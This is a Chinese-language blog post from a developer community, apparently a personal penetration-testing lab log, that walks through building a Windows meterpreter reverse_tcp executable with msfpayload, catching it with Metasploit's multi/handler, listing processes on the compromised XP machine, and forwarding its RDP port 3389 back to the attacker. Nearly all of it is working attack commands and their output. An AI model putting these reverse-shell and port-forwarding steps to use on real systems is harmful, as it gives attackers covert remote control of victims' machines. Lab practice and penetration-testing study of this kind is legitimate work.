渗透杂记2015-01-21-阿里云开发者社区

渗透杂记2015-01-21

2017-11-22 876

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介：

今天来熟悉一下meterpreter，使用环境是KALI、windowsXP

Kali地址：192.168.11.41

windowsXP地址:192.168.11.58

首先生成可执行文件

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.41 LPORT=444 X > meter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 287
Options: {"LHOST"=>"192.168.11.41", "LPORT"=>"444"}
root@kali:~# ls
192.168.11.42 Desktop meter.exe O OpenVAS_TI.asc
开启本地监听

root@kali:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `. ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          : . ` ;    ` ` --,.._;
           ' `    ,   )   .'
              `._ , '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

http://metasploit.pro

Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.9.2-2014051401 [core:4.9 api:1.0] ]
+ -- --=[ 1310 exploits - 780 auxiliary - 221 post        ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > info

       Name: Generic Payload Handler
     Module: exploit/multi/handler
   Platform: Android, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows
Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual

Provided by:
hdm <hdm@metasploit.com>

Available targets:
Id Name
-- ----
0 Wildcard Target

Payload information:
Space: 10000000
Avoid: 0 characters

Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > info

Provided by:
hdm <hdm@metasploit.com>

Available targets:
Id Name
-- ----
0 Wildcard Target

Payload information:
Space: 10000000
Avoid: 0 characters

Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.

msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 444
LPORT => 444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting Required Description
   ----      --------------- -------- -----------
   EXITFUNC process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     444              yes       The listen port

Exploit target:

   Id Name
   -- ----
   0   Wildcard Target

msf exploit(handler) > run

[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.11.58
[*] Meterpreter session 1 opened (192.168.11.41:444 -> 192.168.11.58:1057) at 2015-01-21 01:40:09 -0500

3.在192.168.11.58上执行meter.exe

meterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 2
============
Name : VMware Accelerated AMD PCNet Adapter - pencS zHardware MAC : 00:0c:29:c6:de:84
MTU : 1500
IPv4 Address : 192.168.11.58
IPv4 Netmask : 255.255.255.0

meterpreter > ps

Process List
============

PID   PPID Name               Arch Session     User                           Path
---   ---- ----               ---- -------     ----                           ----
0     0     [System Process]         4294967295
4     0     System             x86   0
212   712   vmtoolsd.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
440   384   conime.exe         x86   0           WWW-95A235B5556\Administrator C:\WINDOWS\system32\conime.exe
568   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
636   568   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
668   568   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
712   668   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
724   668   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
884   712   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
912   712   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
976   712   svchost.exe        x86   0                                          C:\WINDOWS\system32\svchost.exe
1072 712   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
1236 712   svchost.exe        x86   0                                          C:\WINDOWS\system32\svchost.exe
1436 712   svchost.exe        x86   0                                          C:\WINDOWS\system32\svchost.exe
1444 1416 explorer.exe       x86   0           WWW-95A235B5556\Administrator C:\WINDOWS\Explorer.EXE
1460 712   ZhuDongFangYu.exe x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\360\360Safe\deepscan\zhudongfangyu.exe
1568 1444 cmd.exe            x86   0           WWW-95A235B5556\Administrator C:\WINDOWS\system32\cmd.exe
1628 712   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
1784 1444 meter.exe          x86   0           WWW-95A235B5556\Administrator $U$C:\Documents and Settings\Administrator.WWW95A235B5556\\meter.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f722e5757572d39354132333542353535365cd7c0c3e65c6d657465722e657865
1804 1444 vmtoolsd.exe       x86   0           WWW-95A235B5556\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1820 1444 ctfmon.exe         x86   0           WWW-95A235B5556\Administrator C:\WINDOWS\system32\ctfmon.exe

4.在192.168.11.58上开启端口反弹，192.168.11.58上的3389端口反弹到192.168.11.41上的2222端口

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -L <opt> The local host to listen on (optional).
    -h        Help banner.
    -l <opt> The local port to listen on.
    -p <opt> The remote port to connect to.
    -r <opt> The remote host to connect to.
meterpreter > portfwd add -l 2222 -r 192.168.11.58 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 192.168.11.58:3389
meterpreter > portfwd
0: 0.0.0.0:2222 -> 192.168.11.58:3389

1 total local port forwards.